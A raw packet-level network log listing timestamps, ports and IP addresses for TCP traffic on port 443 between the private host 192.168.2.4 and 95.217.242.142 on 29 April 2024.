Apr 29, 2024 22:13:27.600667000 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.600718021 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.600730896 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.600754023 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.600780010 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.606781960 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.606806040 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.606858015 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.606863976 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.606892109 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.606906891 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.610738993 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.610754013 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.610812902 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.610820055 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.610867977 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.615308046 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.615324974 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.615380049 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.615385056 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.615423918 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.620050907 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.620074987 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.620134115 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.620146036 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.620179892 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.624706030 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.624722958 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.624788046 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.624799967 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.624840021 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.629309893 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.629327059 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.629379988 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.629388094 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.629410982 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.629431009 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.634316921 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.634331942 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.634397030 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.634403944 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.634449005 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.638649940 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.638674021 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.638726950 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.638732910 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.638766050 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.638778925 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.643023968 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.643042088 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.643086910 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.643091917 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.643110991 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.643131018 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.647089958 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.647106886 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.647164106 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.647171021 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.647209883 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.651179075 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.651194096 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.651253939 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.651259899 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.651283979 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.651299953 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.655586004 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.655601978 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.655669928 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.655678034 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.655725002 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.663800955 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.663815975 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.663889885 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.663897991 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.663938999 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.667036057 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.667053938 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.667113066 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.667124033 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.667148113 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.667161942 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.671539068 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.671554089 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.671610117 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.671617985 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.671654940 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.675590992 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.675612926 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.675779104 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.675785065 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.675829887 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.679357052 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.679374933 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.679436922 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.679441929 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.679481983 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.682954073 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.682971954 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.683027983 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.683032990 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.683073044 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.686778069 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.686809063 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.686846972 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.686855078 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.686881065 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.686897993 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.691226006 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.691242933 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.691301107 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.691309929 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.691348076 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.694469929 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.694487095 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.694535017 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.694540977 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.694578886 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.697962999 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.697978973 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.698049068 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.698056936 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.698097944 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.702095985 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.702115059 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.702176094 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.702183008 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.702222109 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.705740929 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.705754995 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.705811024 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.705817938 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.705854893 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.709043026 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.709059954 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.709110975 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.709117889 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.709156990 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.712347984 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.712364912 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.712429047 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.712436914 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.712469101 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.712483883 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.716365099 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.716382980 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.716455936 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.716464996 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.716505051 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.721653938 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.721693993 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.721736908 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.721748114 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.721777916 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.721816063 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.723464966 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.723481894 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.723553896 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.723558903 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.723594904 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.726759911 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.726773977 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.726831913 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.726836920 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.726876974 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.729998112 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.730012894 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.730087042 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.730091095 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.730138063 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.733105898 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.733122110 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.733185053 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.733190060 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.733223915 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.736504078 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.736521006 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.736578941 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.736584902 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.736620903 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.740391970 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.740416050 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.740497112 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.740504026 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.740540981 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.743726969 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.743742943 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.743812084 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.743818045 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.743855953 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.746227026 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.746242046 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.746311903 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.746319056 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.746357918 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.748977900 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.748994112 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.749063015 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.749072075 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.749115944 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.752388954 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.752404928 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.752481937 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.752492905 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.752537966 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.755918980 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.755953074 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.756001949 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.756009102 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.756033897 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.756061077 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.758419037 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.758436918 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.758519888 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.758528948 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.758574009 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.761326075 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.761344910 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.761415958 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.761428118 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.761470079 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.765045881 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.765064001 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.765264034 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.765273094 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.765321970 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.767575979 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.767594099 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.767663002 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.767668962 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.767714024 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.770308971 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.770325899 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.770384073 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.770390034 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.770431042 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.773040056 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.773056030 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.773132086 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.773139954 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.773188114 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.776690006 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.776707888 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.776778936 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.776787043 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.776834011 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.779799938 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.779815912 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.779886007 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.779892921 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.779937983 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.782612085 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.782629013 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.782702923 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.782710075 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.782753944 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.785900116 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.785921097 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.785980940 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.785985947 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.786029100 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.788250923 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.788266897 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.788331985 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.788347006 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.788393021 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.790158987 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.790175915 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.790234089 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.790246964 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.790287971 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.792753935 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.792773962 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.792835951 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.792845964 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.792891026 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.796782970 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.796802998 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.796866894 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.796875000 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.796920061 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.798867941 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.798883915 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.798934937 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.798940897 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.798966885 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.798990965 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.800993919 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.801009893 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.801075935 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.801080942 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.801124096 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.804217100 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.804234028 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.804291010 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.804295063 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.804337978 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.806782007 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.806802034 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.806849957 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.806854963 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.806880951 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.806905031 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.809125900 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.809143066 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.809205055 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.809209108 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.809247017 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.811356068 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.811372042 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.811436892 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.811443090 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.811481953 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.813733101 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.813766956 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.813793898 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.813796997 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.813817978 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.813831091 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.813853979 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.813877106 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.814215899 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.814232111 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.903656960 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.903692961 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.903762102 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.903981924 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.903995037 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:28.361500978 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:28.361638069 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:28.366909027 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:28.366919041 CEST	443	49769	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:28.367234945 CEST	49769	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:28.367239952 CEST	443	49769	95.217.242.142	192.168.2.4
